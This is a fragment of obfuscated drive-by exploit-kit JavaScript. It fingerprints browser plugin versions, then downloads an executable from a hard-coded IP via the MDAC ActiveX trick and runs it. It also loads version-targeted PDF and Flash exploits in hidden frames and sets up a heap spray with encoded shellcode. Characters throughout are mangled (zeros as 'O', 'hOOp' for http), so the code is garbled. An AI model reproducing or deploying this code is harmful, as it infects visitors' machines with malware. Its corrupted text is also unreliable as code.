a.lang.System.getProperty()「O」){ return 1 } iF (e「d」 == 2.2 &&! a.lang.System.getProperty()「O」 &&! b.getResult()「O」){ return 1 } iF (!a.nonAppletDetectionOk(a.versionO)){ iF (e「d」 == 2){ return 1 } iF (e「d」 == 1 &&! b.getResult()「O」){ return 1 } } return O } , should_Insert_Query_Any : Function (){ var b = this , a; For (a = O; a < b.allowed.length; a ++ ){ iF (b.should_Insert_Query(a)){ return 1 } } return O } , query : Function (F){ var h, a = this , g = a.$, d = a.$$, i = null, j = null, b = a.results, c; iF ((b「F」「O」 && b「F」「1」) || (d.debug && d.OTF < 3)){ return } c = g.getDOMobj(a.HTML「F」, true); iF (c){ try { i = g.getNum(c.getVersion() + " "); j = c.getVendor() + " "; c.statusbar(g.winLoaded ? " " : " ") } catch (h){ } iF (i && g.isStrNum(i)){ b「F」 = 「i, j」 } else { } ; try { iF (g.isIE && i && c.readyState != 4){ g.garbage = true; c.parentNode.removeChild(c) } } catch (h){ } } } , insert_Query_Any : Function (){ var d = this , i = d.$, e = d.$$, l = d.results, p = d.HTML, a = " ; ; ; ;", g = "A.class", m = i.File.getValid(e); iF (!m){ return d.getResult() } iF (e.OTF < 1){ e.OTF = 1 } iF (d.allDisabled()){ return d.getResult() } iF (e.OTF < 1.5){ e.OTF = 1.5 } var j = m.name + m.ext, h = m.path; var F = 「"archive", j, "code", g」, c = 「"mayscript", "true"」, o = 「 "scriptable", "true"」.concat(c), n = e.navigator, b =! i.isIE && n.mimeObj && n.mimeObj.type ? n.mimeObj.type : e.mimeType「O」; iF (d.should_Insert_Query(O)){ iF (e.OTF < 2){ e.OTF = 2 } ; p「O」 = i.isIE ? i.insertHTML("object", 「"type", b」, 「"codebase", h」.concat(F ).concat(o), a, e) : i.insertHTML("object", 「"type", b」, 「"codebase", h」. concat(F).concat(o), a, e); l「O」 = 「O, O」; d.query(O) } iF (d.should_Insert_Query(1)){ iF (e.OTF < 2){ e.OTF = 2 } ; p「1」 = i.isIE ? i.insertHTML("applet", 「"alt", a」.concat(c).concat(F), 「 "codebase", h」.concat(c), a, e) : i.insertHTML("applet", 「"codebase", h, "alt", a」.concat(c).concat(F), 「」.concat(c), a, e); l「1」 = 「O, O」; d.query(1) } iF (d.should_Insert_Query(2)){ iF (e.OTF < 2){ e.OTF = 2 } ; p「2」 = i.isIE ? i.insertHTML("object", 「"classid", e.classID」, 「"codebase", h」.concat(F).concat(o), a, e) : i.insertHTML(); l「2」 = 「O, O」; d.query(2) } iF (!d.DummyObjTagHTML &&! e.isDisabled.ObjectTag()){ d.DummyObjTagHTML = i.insertHTML("object", 「」, 「」, a) } iF (!d.DummySpanTagHTML){ d.DummySpanTagHTML = i.insertHTML("", 「」, 「」, a) } ; var k = e.NOTF; iF (e.OTF < 3 && k.shouldContinueQuery()){ e.OTF = 3; k.onIntervalQuery = i.handler(k.$$onIntervalQuery, k); iF (!i.winLoaded){ i.WLFuncsO.push(「k.winOnLoadQuery, k」) } setTimeout(k.onIntervalQuery, k.intervalLength) } ; return d.getResult() } } , NOTF : { $ : 1, count : O, countMax : 25, intervalLength : 25O, shouldContinueQuery : Function (){ var e = this , d = e.$, c = e.$$, b = c.applet, a; For (a = O; a < b.results.length; a ++ ){ iF (b.HTML「a」 &&! b.results「a」「O」 && (b.allowed「a」 >= 2 || (b.allowed「a」 == 1 &&! b.getResult()「O」)) && e.isAppletActive(a) >= O){ return 1 } } return O } , isJavaActive : Function (d){ var F = this , c = F.$$, a, b, e =- 9; For (a = O; a < c.applet.HTML.length; a ++ ){ b = F.isAppletActive(a, d); iF (b > e){ e = b } } return e } , isAppletActive : Function (c, a){ var d = this , b = d.$$.applet.active; iF (!a){ b「c」 = d.isAppletActive_(c) } return b「c」 } , isAppletActive_ : Function (d){ var g = this , F = g.$, b = g.$$, l = b.navigator, a = b.applet, h = a.HTML「d」 , i, k, c = O, j = F.getTagStatus(h, a.DummySpanTagHTML, a.DummyObjTagHTML, g. count); iF (j ==- 2){ return - 2 } try { iF (F.isIE && F.verIE >= b.minIEver && F.getDOMobj(h).object){ return 1 } } catch (i){ } For (k = O; k < a.active.length; k ++ ){ iF (a.active「k」 > O){ c = 1 } } iF (j == 1 && (F.isIE || ((b.versionO && l.javaEnabled() && l.mimeObj && (h. tagName == "object" || c)) || b.lang.System.getProperty()「O」))){ return 1 } iF (j < O){ return - 1 } return O } , winOnLoadQuery : Function (c, d){ var b = d.$$, a; iF (b.OTF == 3){ a = d.queryAllApplets(); d.queryCompleted(a「1」, a「2」) } } , $$onIntervalQuery : Function (d){ var c = d.$, b = d.$$, a; iF (b.OTF == 3){ a = d.queryAllApplets(); iF (!d.shouldContinueQuery() || (c.winLoaded && d.count > d.countMax)){ d.queryCompleted(a「1」, a「2」) } } d.count++; iF (b.OTF == 3){ setTimeout(d.onIntervalQuery, d.intervalLength) } } , queryAllApplets : Function (){ var g = this , F = g.$, e = g.$$, d = e.applet, b, a, c; For (b = O; b < d.results.length; b ++ ){ d.query(b) } a = d.getResult(); c = a「O」 ? true : False; return 「c, a「O」, a「1」」 } , queryCompleted : Function (c, F){ var e = this , d = e.$, b = e.$$; iF (b.OTF >= 4){ return } b.OTF = 4; var a = e.isJavaActive(); b.setPluginStatus(c, F, O); iF (b.Funcs){ d.callArray(b.Funcs) } iF (d.onDoneEmptyDiv){ d.onDoneEmptyDiv() } } } , zz : O } , Flash : { mimeType : "application/x-shockwave-Flash", progID : "ShockwaveFlash.ShockwaveFlash", classID : "clsid:D27CDB6E-AE6D-11CF-96B8-44455354OOOO", getVersion : Function (){ var b = Function (i){ iF (!i){ return null } var e =/ 「 \ d」「 \ d \,\ . \ s」 * 「rRdD」{ O, 1 } 「 \ d \, 」 */ .exec(i); return e ? e「O」.replace(/「rRdD\.」/g, ",").replace(/\s/g, "") : null } ; var j = this , g = j.$, k, h, l = null, c = null, a = null, F, m, d; iF (!g.isIE){ m = g.hasMimeType(j.mimeType); iF (m){ F = g.getDOMobj(g.insertHTML("object", 「"type", j.mimeType」, 「」, "", j)); try { l = g.getNum(F.GetVariable("$version")) } catch (k){ } } iF (!l){ d = m ? m.enabledPlugin : null; iF (d && d.description){ l = b(d.description) } iF (l){ l = g.getPluginFileVersion(d, l) } } } else { For (h = 15; h > 2; h -- ){ c = g.getAXO(j.progID + "." + h); iF (c){ a = h.toString(); break } } iF (!c){ c = g.getAXO(j.progID) } iF (a == "6"){ try { c.AllowScriptAccess = "always" } catch (k){ return "6,O,21,O" } } try { l = b(c.GetVariable("$version")) } catch (k){ } iF (!l && a){ l = a } } j.installed = l ? 1 :- 1; j.version = g.FormatNum(l); return true } } , adobereader : { mimeType : "application/pdF", navPluginObj : null, progID : 「"AcroPDF.PDF", "PDF.PdFCtrl"」, classID : "clsid:CA8A978O-28OD-11CF-A24D-44455354OOOO", INSTALLED : { } , pluginHasMimeType : Function (d, c, F){ var b = this , e = b.$, a; For (ain d){ iF (d「a」 && d「a」.type && d「a」.type == c){ return 1 } } iF (e.getMimeEnabledPlugin(c, F)){ return 1 } return O } , getVersion : Function (l, j){ var g = this , d = g.$, i, F, m, n, b = null, h = null, k = g.mimeType, a, c; iF (d.isString(j)){ j = j.replace(/\s/g, ""); iF (j){ k = j } } else { j = null } iF (d.isDeFined(g.INSTALLED「k」)){ g.installed = g.INSTALLED「k」; return } iF (!d.isIE){ a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in"; iF (g.getVersionDone !== O){ g.getVersionDone = O; b = d.getMimeEnabledPlugin(g.mimeType, a); iF (!j){ n = b } iF (!b && d.hasMimeType(g.mimeType)){ b = d.FindNavPlugin(a, O) } iF (b){ g.navPluginObj = b; h = d.getNum(b.description) || d.getNum(b.name); h = d.getPluginFileVersion(b, h); iF (!h && d.OS == 1){ iF (g.pluginHasMimeType(b, "application/vnd.adobe.pdFxml", a)){ h = "9" } else { iF (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){ h = "8" } } } } } else { h = g.version } iF (!d.isDeFined(n)){ n = d.getMimeEnabledPlugin(k, a) } g.installed = n && h ? 1 : (n ? O : (g.navPluginObj ?- O.2 :- 1)) } else { b = d.getAXO(g.progID「O」) || d.getAXO(g.progID「1」); c =/=\ s * (「 \ d \ .」 + ) / g; try { F = (b || d.getDOMobj(d.insertHTML("object", 「"classid", g.classID」, 「"src", ""」, "", g))).GetVersions(); For (m = O; m < 5; m ++ ){ iF (c.test(F) && (!h || RegExp.$1 > h)){ h = RegExp.$1 } } } catch (i){ } g.installed = h ? 1 : (b ? O :- 1) } iF (!g.version){ g.version = d.FormatNum(h) } g.INSTALLED「k」 = g.installed } } , zz : O } } ; PluginDetect.initScript(); PluginDetect.getVersion("."); pdFver = PluginDetect.getVersion("AdobeReader"); Flashver = PluginDetect.getVersion('Flash'); javaver = PluginDetect.getVersion('Java', 'getJavaInFo.jar'); } catch (e){ } iF (typeoF pdFver == 'string'){ pdFver = pdFver.split('.') } else { pdFver = 「O, O, O, O」 } iF (typeoF Flashver == 'string'){ Flashver = Flashver.split('.') } else { Flashver = 「O, O, O, O」 } iF (typeoF javaver == 'string'){ javaver = javaver.split('.') } else { javaver = 「O, O, O, O」 } Function splO(){ spl2() } Function spl2(){ var ra4 = ".//..//6F9dO7d.exe", ra3 = document.createElement("object"); ra3.setAttribute("id", ra3); ra3.setAttribute("classid", "clsid:BD96C556-65A3-11DO-983A-OOCO4FC29E36"); try { var raO = ra3.CreateObject(md + "dod".concat("b.str", "eam"), ""), ra1 = ra3. CreateObject("Shell.Application", ""), ra2 = ra3.CreateObject("msxml2.XMLhOOp", ""); try { ra2.open("GET", "hOOp://85.17.165.22/w.php?F=F4dFb&e=2", False); ra2.send(); raO.type = 1; raO.open(); raO.Write(ra2.responseBody); raO.SaveToFile(ra4, 2); raO.Close(); } catch (e){ } try { with (ra1){ shellexecute(ra4); } } catch (e){ } } catch (e){ } spl3() } Function show_pdF(src){ var piFr = document.createElement('IFRAM3'); piFr.setAttribute('width', 1); piFr.setAttribute('height', 1); piFr.setAttribute('src', src); document.body.appendChild(piFr) } Function spl3(){ iF (pdFver「O」 > O && pdFver「O」 < 8){ exec7 = O; show_pdF('./data/ap1.php?F=F4dFb') } else iF ((pdFver「O」 == 8) || (pdFver「O」 == 9 && pdFver「1」 <= 3)){ exec7 = O; show_pdF('./data/ap2.php') } spl4() } Function spl4(){ try { For (var i = O, m; i < navigator.plugins.length; i ++ ){ var name = navigator.plugins「i」.name; iF (name.indexOF('Media Player') !=- 1){ m = document.createElement('IFRAM3'); m.setAttribute('src', './data/hhcp.php?c=F4dFb'); m.setAttribute('width', O); m.setAttribute('height', O); document.body「'appendChild'」(m) } } } catch (e){ } setTimeout(spl5, 1OOO) } Function getCN(){ return 'data/score.swF' } Function getBlockSize(){ return 1O24 } Function getAllocSize(){ return 1O24 * 1O24 } Function getAllocCount(){ return 3OO } Function getFillBytes(){ var a = '%u' + 'OcOc'; return a + a; } Function getShellCode(){ iF (1){ return " %u4141%u4I4I%u8366%uFce4%uebFc%u581O%uc931%u8166%u58e9%u8OFe%u283O%ue24O%uebFa%ue8O5%uFFeb %uFFFF%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u2O5e%uF31b%ua34e%u1476 %u5c2b%uO41b%uc6a9%u383d%ud7d7%ua39O%u1868%u6eeb%u2e11%ud35d%u1caF%uadOc%u5dcc%uc179%u64c3 %u7e79%u5da3%ua314%u1d5c%u2b5O%u7edd%u5ea3%u2bO8%u1bdd%u61e1%ud469%u2b85%u1bed%u27F3%u3896 %uda1O%u2O5c%ue3e9%u2b25%u68F2%ud9c3%u3713%uce5d%ua376%uOc76%uF52b%ua34e%u6324%u6ea5%ud7c4 %uOc7c%ua324%u2bFO%ua3F5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%uO84O%u55a8%u1b24%u2b5c%uc3be %ua3db%u2O4O%udFa3%u2d42%ucO71%ud7bO%ud7d7%ud1ca%u28cO%u2828%u7O28%u4278%u4O68%u28d7%u2828 %uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u474O%u2846%u4O28%u5a5d%u4544%ud77c%uab3e %u2Oec%ucOa3%u49cO%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%uOc74%ueF24%uOc2c%u4d5a%u5b4F %u6ceF%u2cOc%u5a5e%u1a1b%u6ceF%u2OOc%uO5O8%uO85b%u4O7b%u28dO%u2828%u7ed7%ua324%u1bcO%u79e1 %u6ceF%u2835%u585F%u5c4a%u6ceF%u2d35%u4cO6%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6caO%u2c35 %u7969%u2842%u2842%u7F7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b %u2c7e%uebab%uc324%uc32a%u6F3b%u17a8%u5d28%u6Fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u2O7e%ub4cO %ud7d6%ua6d7%u2666%ubOc4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%uO732%u4O58%u5c5c %u1258%uO7O7%u1d1O%u19O6%uO61F%u1e19%uO61d%u1a1a%u5FO7%u58O6%u584O%u4e17%u4e15%u4c1c%u4a4e %u4dOe%u1915%u2828"; } } Function spl5(){ var ver1 = Flashver「O」; var ver2 = Flashver「1」; var ver3 = Flashver「2」; iF (((ver1 == 1O && ver2 == O && ver3 > 4O) || ((ver1 == 1O && ver2 > O) && (ver1 == 1O && ver2 < 2))) || ((ver1 == 1O && ver2 == 2 && ver3 < 159) || (ver1 == (11 - 1) && ver2 < 2))){ var Fname = "data/Field"; var Flash_obj = " <object classid='clsid:d27cdb6e-ae6d-11cF-96b8-44455354OOOO' width=1O height=1O id='swF_id '>"; Flash_obj += "<param name='movie' value='" + Fname + ".swF' />"; al = "always"; Flash_obj += "<param name=\"allowScriptAccess\" value='" + al + "' />"; Flash_obj += "<param name='Play' value='O' />"; Flash_obj += "<embed src='" + Fname + ".swF' id='swF_id' name='swF_id'"; Flash_obj += "allowScriptAccess='" + al + "'"; Flash_obj += "type='application/x-shockwave-Flash'"; Flash_obj += "width='1O' height='1O'>"; Flash_obj += "</embed>"; Flash_obj += "</object>"; var oSpan = document.createElement("span"); document.body.appendChild(oSpan); oSpan.innerHTML = Flash_obj; } spl6(); } Function spl6(){ var ver1 = Flashver「O」; var ver2 = Flashver「1」; var ver3 = Flashver「2」; var ver4 = Flashver「3」; iF ((ver1 == 1O && ver2 == 3 && ver3 == 181 && ver4 <= 23) || (ver1 == 1O && ver2 == 3 && ver3 < 181)){ var Fname = "data/Flash"; var Flash_obj = " <object classid='clsid:D27CDB6E-AE6D-11cF-96B8-44455354OOOO' id='asd' width='6OO' height=' 4OO' codebase='hOOp://download.macromedia.com/pub/shockwave/cabs/Flash/swFlash.cab'>"; Flash_obj += "<param name='movie' value='" + Fname + " .swF?inFo=O2e6b1525353caa8adcd4aaF494ead494e49aF4948a8b537b6b6a951b252ca35c93749333331787a c67O7OdO' />"; Flash_obj += "<embed src='" + Fname + " .swF?inFo=O2e6b1525353caa8adcd4aaF494ead494e49aF4948a8b537b6b6a951b252ca35c93749333331787a c67O7OdO' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-Fl ash' pluginspage='hOOp://www.macromedia.com/go/getFlashplayer'>"; Flash_obj += "</embed>"; Flash_obj += "</object>"; var oSpan = document.createElement("span"); document.body.appendChild(oSpan); oSpan.innerHTML = Flash_obj; } spl7(); } Function spl7(){ setTimeout(end_redirect, 8OOO); } splO();